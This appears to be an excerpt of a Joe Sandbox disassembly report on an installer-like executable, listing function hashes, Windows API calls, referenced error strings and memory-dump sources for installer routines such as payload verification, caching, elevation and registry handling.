                                                                                                                                                                                                                                                                                                  • Instruction ID: ad7b910648e340db2d55063746681899d29cab177b57f957e7c986a450106196
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c7c43e9b4af2c76680b93e39cbbcb6a652a8b8e31d12fc29ae6f501adee0f24
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29615B76500609EFCB15DF58C980AAABBF9FF84314B21845AE909DB315EB31EA41DB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008AB500,00000000,?), ref: 008706D3
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,008AB500,00000000,?), ref: 008706E2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0087061A,?,00000000,00020006), ref: 008A0C0E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • %ls.RebootRequired, xrefs: 008705F0
                                                                                                                                                                                                                                                                                                  • Failed to delete registration key: %ls, xrefs: 00870681
                                                                                                                                                                                                                                                                                                  • Failed to write volatile reboot required registry key., xrefs: 0087061E
                                                                                                                                                                                                                                                                                                  • Failed to update resume mode., xrefs: 008706B7
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 008705AC
                                                                                                                                                                                                                                                                                                  • Failed to open registration key., xrefs: 0087071A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$Create
                                                                                                                                                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 359002179-3398658923
                                                                                                                                                                                                                                                                                                  • Opcode ID: 99b6240346143be2e3dfda900a22708fa36d8d1bec557d38e449bc78874bf1bc
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43bfe3e3aaf3bba7719088eacb841f902df394aa07e7314cd3963809fb8d3545
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99b6240346143be2e3dfda900a22708fa36d8d1bec557d38e449bc78874bf1bc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1418B31800708FBDF22AEA4CC16AAF7BBAFFA1314F148419F519E1265D771DA609E52
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,771ADFD0), ref: 008A6C88
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 008A6CA5
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6CE3
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6D27
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$CompareFree
                                                                                                                                                                                                                                                                                                  • String ID: email$name$uri
                                                                                                                                                                                                                                                                                                  • API String ID: 3589242889-1168628755
                                                                                                                                                                                                                                                                                                  • Opcode ID: ecaadd9c3e8851966a36f8dae2700e3a0dd7e5f7794089d13e16d3b343274333
                                                                                                                                                                                                                                                                                                  • Instruction ID: 98acd9b3f26d92b5f6f0d2f0483302c5cb740f0f2284dd2d6f6eadd42fc62ad7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ecaadd9c3e8851966a36f8dae2700e3a0dd7e5f7794089d13e16d3b343274333
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B418E31A01219BBEB119B94CD44FADB774FF06725F2842A8E920EB694E7359E20DB50
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086F48A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00864115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?), ref: 00864123
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00864115: GetLastError.KERNEL32(?,0087A0E8,00000000,00000000,?,00000000,008653BD,00000000,?,?,0086D5B5,?,00000000,00000000), ref: 00864131
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(008AB500,00000000,00000094,00000000,00000094,?,?,008704BF,swidtag,00000094,?,008AB518,008704BF,00000000,?,00000000), ref: 0086F4DD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4DB3: CreateFileW.KERNEL32(008AB500,40000000,00000001,00000000,00000002,00000080,00000000,008704BF,00000000,?,0086F4F4,?,00000080,008AB500,00000000), ref: 008A4DCB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4DB3: GetLastError.KERNEL32(?,0086F4F4,?,00000080,008AB500,00000000,?,008704BF,?,00000094,?,?,?,?,?,00000000), ref: 008A4DD8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • swidtag, xrefs: 0086F49D
                                                                                                                                                                                                                                                                                                  • Failed to create regid folder: %ls, xrefs: 0086F525
                                                                                                                                                                                                                                                                                                  • Failed to write tag xml to file: %ls, xrefs: 0086F51B
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid folder path., xrefs: 0086F53C
                                                                                                                                                                                                                                                                                                  • Failed to allocate regid file path., xrefs: 0086F535
                                                                                                                                                                                                                                                                                                  • Failed to format tag folder path., xrefs: 0086F543
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
                                                                                                                                                                                                                                                                                                  • API String ID: 904508749-1201533908
                                                                                                                                                                                                                                                                                                  • Opcode ID: f33adc070983cfc4068bea6c8f9946433f5952a42af2189d46d637305a4a508a
                                                                                                                                                                                                                                                                                                  • Instruction ID: b770ae652a1ed572d5b594507f58b987a18d8b15b060ac6be4d1bc4ddb3ec7dd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f33adc070983cfc4068bea6c8f9946433f5952a42af2189d46d637305a4a508a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88319C32C00619BBDF12AE98DC49B9DBBB4FF04710F114165FA11FA252D7709E50DB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0086548E,00000000,00000000,?,00000000), ref: 0087548B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00864C61,?,?,00000000,?,?,?,?,?,?,008AB4A0,?,?), ref: 00875496
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to write exit code to message buffer., xrefs: 00875406
                                                                                                                                                                                                                                                                                                  • Failed to wait for child process exit., xrefs: 008754C4
                                                                                                                                                                                                                                                                                                  • Failed to post terminate message to child process., xrefs: 00875476
                                                                                                                                                                                                                                                                                                  • Failed to post terminate message to child process cache thread., xrefs: 0087545A
                                                                                                                                                                                                                                                                                                  • pipe.cpp, xrefs: 008754BA
                                                                                                                                                                                                                                                                                                  • Failed to write restart to message buffer., xrefs: 0087542E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1211598281-2161881128
                                                                                                                                                                                                                                                                                                  • Opcode ID: d8dbac8b5f8c399cb2b95e511d043e817f101951a9fe44136701ffcc088205d7
                                                                                                                                                                                                                                                                                                  • Instruction ID: c27efd6bef7e535949b56d74391a4e97bb8cefeaac6382275193a2dc82388f89
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8dbac8b5f8c399cb2b95e511d043e817f101951a9fe44136701ffcc088205d7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE214772800A3AB7DF225B549C02E9E7728FB00721F108251F918F6295D774ED4086E9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,00879F04,00000003,000007D0,00000003,?,000007D0), ref: 008790B2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00879F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 008790BF
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00879F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 00879187
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to open payload at path: %ls, xrefs: 00879103
                                                                                                                                                                                                                                                                                                  • Failed to verify hash of payload: %ls, xrefs: 00879172
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 008790F6
                                                                                                                                                                                                                                                                                                  • Failed to verify catalog signature of payload: %ls, xrefs: 0087914E
                                                                                                                                                                                                                                                                                                  • Failed to verify signature of payload: %ls, xrefs: 0087912F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2528220319-2757871984
                                                                                                                                                                                                                                                                                                  • Opcode ID: e7d76b01a80af353489b63443ffc25af76d8827cc3aec5a993e0da7c86bb883b
                                                                                                                                                                                                                                                                                                  • Instruction ID: d30fccd5ddf725a738f06f1c66fbfe58203dac71a5fc9875aeb976b29affe859
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7d76b01a80af353489b63443ffc25af76d8827cc3aec5a993e0da7c86bb883b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3221F632540627B7DB221A688C89F9A7B28FF40770F51C211FC58E62949329DC31DBE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00866B69
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866B73
                                                                                                                                                                                                                                                                                                  • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00866BB7
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866BC1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 124030351-4026719079
                                                                                                                                                                                                                                                                                                  • Opcode ID: a53f1c4f09f3eac12fb121d04e74b09c67d3f7286c3428bcbeaf7c6220e4b8b8
                                                                                                                                                                                                                                                                                                  • Instruction ID: d15f39b4b70163c3198c3372ca9684011bbb512a6b8a23f5e44347abb9c98660
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a53f1c4f09f3eac12fb121d04e74b09c67d3f7286c3428bcbeaf7c6220e4b8b8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C21F973E41639A7E720A6548D06F9B77ACFB01B20F024175BD04F7242FA74AE404AE6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869C88
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0086A895,00000100,000002C0,000002C0,?,000002C0), ref: 00869CA0
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00869CAB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869C93
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 00869D2B
                                                                                                                                                                                                                                                                                                  • Failed get to file attributes. '%ls', xrefs: 00869CE8
                                                                                                                                                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00869CFD
                                                                                                                                                                                                                                                                                                  • search.cpp, xrefs: 00869CDB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-2053429945
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8624c953bafc4fcbcc806854e6ac1194eddf536a85f642e189e046cb7276a4fd
                                                                                                                                                                                                                                                                                                  • Instruction ID: d4d24f6d2138aa8c9f3c1f178dc240a03d442f1000d490c1e45bbde8b55bf7fd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8624c953bafc4fcbcc806854e6ac1194eddf536a85f642e189e046cb7276a4fd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E212633940624BAFB211A988C46FAEB65CFF12761F120221FD54F66D0D7755D1096D2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 0087AD57
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087AD61
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0087ADA0
                                                                                                                                                                                                                                                                                                  • CoUninitialize.OLE32(?,0087C721,?,?), ref: 0087ADDD
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 0087ADCB
                                                                                                                                                                                                                                                                                                  • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 0087AD8F
                                                                                                                                                                                                                                                                                                  • Failed to initialize COM., xrefs: 0087ADAC
                                                                                                                                                                                                                                                                                                  • elevation.cpp, xrefs: 0087AD85
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 876858697-113251691
                                                                                                                                                                                                                                                                                                  • Opcode ID: 045f90384cf2976216b2e822e2412864f94ac2da4f962be6e2e81c93568eeac9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00104d7d95b1714daa1ac3658965cea0acbc8d67ddeb1cdacf963cd6fa531e09
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 045f90384cf2976216b2e822e2412864f94ac2da4f962be6e2e81c93568eeac9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C112332941635BB973A1758CC0999EBEA8FF46B627018116FD04F7B10EB60DC0086D2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00865D68
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008A112B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008A1163
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$Close
                                                                                                                                                                                                                                                                                                  • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                                                                                                                                                  • API String ID: 1979452859-3209209246
                                                                                                                                                                                                                                                                                                  • Opcode ID: b6fa72b91413503e8f4e86baab047ef1bf97eb075af915b2cf3b6ebf49f956bc
                                                                                                                                                                                                                                                                                                  • Instruction ID: ca1c6b1337d4d35d5f8ef93615542425f79b776162071c52706772e720942ac9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6fa72b91413503e8f4e86baab047ef1bf97eb075af915b2cf3b6ebf49f956bc
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA01F932945B29F7DB125698CC0AE9E7768FF02720F164165F901F6AA1C7758E0096D1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0088A33E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0088A348
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 0088A425
                                                                                                                                                                                                                                                                                                  • Failed to clear readonly bit on payload destination path: %ls, xrefs: 0088A377
                                                                                                                                                                                                                                                                                                  • :, xrefs: 0088A3C1
                                                                                                                                                                                                                                                                                                  • download, xrefs: 0088A308
                                                                                                                                                                                                                                                                                                  • apply.cpp, xrefs: 0088A36C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                  • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                                                                                                                                                                                                  • API String ID: 1799206407-1905830404
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1232fc6e0b6b0c1fd23f32937c39b2855c6f03f219a120a574e439801ab18c5b
                                                                                                                                                                                                                                                                                                  • Instruction ID: a473300050bd98f47d9a15e70b14c15f009d2741267b1732f8c15fd36cf6cfa7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1232fc6e0b6b0c1fd23f32937c39b2855c6f03f219a120a574e439801ab18c5b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94517275A00619AFEB25EF98C841EAEB7B4FF14710F14815AE914EB381E375DE40CB92
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,771ADFD0,000000FF,type,000000FF,?,771ADFD0,771ADFD0,771ADFD0), ref: 008A6F55
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A6FA0
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A701C
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7068
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Free$Compare
                                                                                                                                                                                                                                                                                                  • String ID: type$url
                                                                                                                                                                                                                                                                                                  • API String ID: 1324494773-1247773906
                                                                                                                                                                                                                                                                                                  • Opcode ID: 97920cd2f7c6111961ee096ee9626386821529b75969310a8721c25885c4f4fd
                                                                                                                                                                                                                                                                                                  • Instruction ID: e8f4cd1fc62edb61e421711e0e36c625b41dd54dbca652fc08477e903e86715e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97920cd2f7c6111961ee096ee9626386821529b75969310a8721c25885c4f4fd
